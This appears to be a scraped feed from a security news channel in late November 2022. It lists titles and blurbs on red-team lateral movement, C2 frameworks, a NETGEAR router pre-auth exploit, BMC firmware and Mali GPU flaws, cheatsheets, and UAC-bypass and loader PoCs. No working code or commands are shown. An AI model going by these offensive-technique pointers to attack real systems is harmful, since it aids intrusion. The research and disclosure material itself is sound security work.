🔥Home Grown Red Team: Lateral Movement With Havoc C2 And Microsoft EDR
Lateral movement is extremely important for any red team engagement. Getting your initial shell is great, but if you can’t move off the box you could be dead in the water.
2022-11-30 09:09:04
Hive Ransomware v5-5.2 file decryption tool
2022-11-30 07:33:47
SGX.Fail - Overview of SGX Attacks. November 30, 2022 at 07:59AM by Gallus via reddit
2022-11-30 06:29:29
☃️ Penetration Testing Reference Bank - OSCP / PTP & PTX Cheatsheet ☃️
➡️ Wireless Testing
➡️ Networking
➡️ Mobile App Testing
much more...
#oscp #bugbounty #activedirectory #redteaming #infosec #hacking #cybersecurity
2022-11-30 01:57:03
Xiongmai IoT Exploitation. November 30, 2022 at 01:50AM by chicksdigthelongrun via reddit
2022-11-29 17:03:04
Are you looking for OSINT books? In the overview below you will find various books about Open Source Intelligence (OSINT), Social Media Intelligence (SOCMINT), Privacy, Hacking, Red Teaming, Blue Teaming, Brand Protection, Automation and more! ▫️ security post uploader admin @hayper007
2022-11-29 15:20:57
BugBountyTips #BugBounty (Bypasses, Payloads, and more)
2022-11-29 12:00:18
otp
One Time Password utilities Go / Golang
One Time Passwords (OTPs) are a mechanism to improve security over passwords alone. When a Time-based OTP (TOTP) is stored on a user's phone, and combined with something the user knows (Password), you have an easy on-ramp to Multi-factor authentication without adding a dependency on a SMS provider. This Password and TOTP combination is used by many popular websites including Google, GitHub, Facebook, Salesforce and many others.
The otp library enables you to easily add TOTPs to your own application, increasing your user's security against mass-password breaches and malware.
2022-11-29 12:00:17
#mobile #dfir
2022-11-29 04:03:56 leak leak igsample #hacker_bano_chutiya_nhe 👻👻
2022-11-28 17:37:00
2022-11-28 16:03:23
2022-11-28 13:41:43
🔥Mind the Gap
The week before FirstCon22, Maddie gave an internal preview of her talk ("0-day In-the-Wild Exploitation in 2022…so far"). Inspired by the description of an in-the-wild vulnerability in low-level memory management code, fellow Project Zero researcher Jann Horn started auditing the ARM Mali GPU driver. Over the next three weeks, Jann found five more exploitable vulnerabilities (2325, 2327, 2331, 2333, 2334).
⚠️The vulnerabilities discussed in this blog post (CVE-2022-33917) are fixed by the upstream vendor, but at the time of publication, these fixes have not yet made it downstream to affected Android devices (including Pixel, Samsung, Xiaomi, Oppo and others). Devices with a Mali GPU are currently vulnerable.
2022-11-28 13:39:38
#Research "Investigating co-occurrences of MITRE ATT&CK Techniques", 2022.
2022-11-28 13:39:37
#Infosec_Standards NIST SP 800-215: "Guide to a Secure Enterprise Network Landscape", August 5, 2022.
2022-11-28 13:39:34
#DFIR #Blue_Team_Techniques Linux Forensics
2022-11-28 13:39:33
#IoT_Security
1. Vulnerabilities in BMC Firmware Affect OT/IoT Device Security
2. IoT Security Administrator’s Guide
2022-11-28 13:39:32
#Cloud_Security An Azure Exploitation Toolkit for Red Team & Pentesters
2022-11-28 13:39:31
#tools #Offensive_security
1. A terminal-based editor for PowerShell
2. Cobalt Strike Community Kit - central repository of extensions written by the user community to extend the capabilities of Cobalt Strike
2022-11-28 11:38:23
Containers: Rootful, Rootless, Privileged and Super Privileged.
2022-11-27 14:19:28
📌Manual SQL Injection Cheatsheet #bugbounty #infosec
2022-11-27 12:53:32
2022-11-27 12:02:06
💥NETGEAR R7800 AFPD PreAuth + PoC exploit
A heap-buffer overflow in afpdʼs dsi_writeinit is leveraged to overwrite the proto_close function pointer in the DSI struct, and execute arbitrary code on the NETGEAR R7800 Smart Router, in the default configuration, on the LAN side, pre-auth.
2022-11-27 12:01:55
🔥Vulnerabilities in BMC Firmware Affect OT/IoT Device Security (part1)
By abusing these vulnerabilities, an unauthenticated attacker may achieve RCE with root privileges on the BMC, completely compromising it and gaining control of the managed host. During our research, we uncovered other vulnerabilities whose patching is still in progress and thus cannot be disclosed as of yet; those will be covered in a follow-up blog post. Our discussion starts with an introduction to BMCs and an illustration of the vulnerabilities discovered. We will then provide an example of how an attacker can abuse these issues to ultimately compromise the device, and conclude with remediations that asset owners can implement.
2022-11-27 12:01:40
💥Nighthawk: An Up-and-Coming Pentest Tool Likely to Gain Threat Actor Notice
Nighthawk is a mature and advanced commercial C2 framework for lawful red team operations that is specifically built for detection evasion, and it does this well. While Proofpoint researchers are not aware of adoption of Nighthawk in the wild by attributed threat actors, it would be incorrect and dangerous to assume that this tool will never be appropriated by threat actors with a variety of intents and purposes.
🔥🔥🔥PoC of the removed registered LdrDllNotification for your enjoyment.
🔥🔥🔥PoC for utilizing RtlQueueWorkItem to load libraries
2022-11-26 17:01:32
2022-11-26 14:13:51
#Research "Nessie: Automatically Testing JavaScript APIs with Asynchronous Callbacks", 2022. ]->
2022-11-26 14:13:50
#Red_Team_Tactics
1. Header spoofing via a hidden parameter in Facebook Batch GraphQL APIs
2. UAC Bypass On Windows Defender For Endpoint With HighBorn
2022-11-26 14:13:49
#Research "SARA: Secure Android Remote Authorization", 2022. ]-> Repo: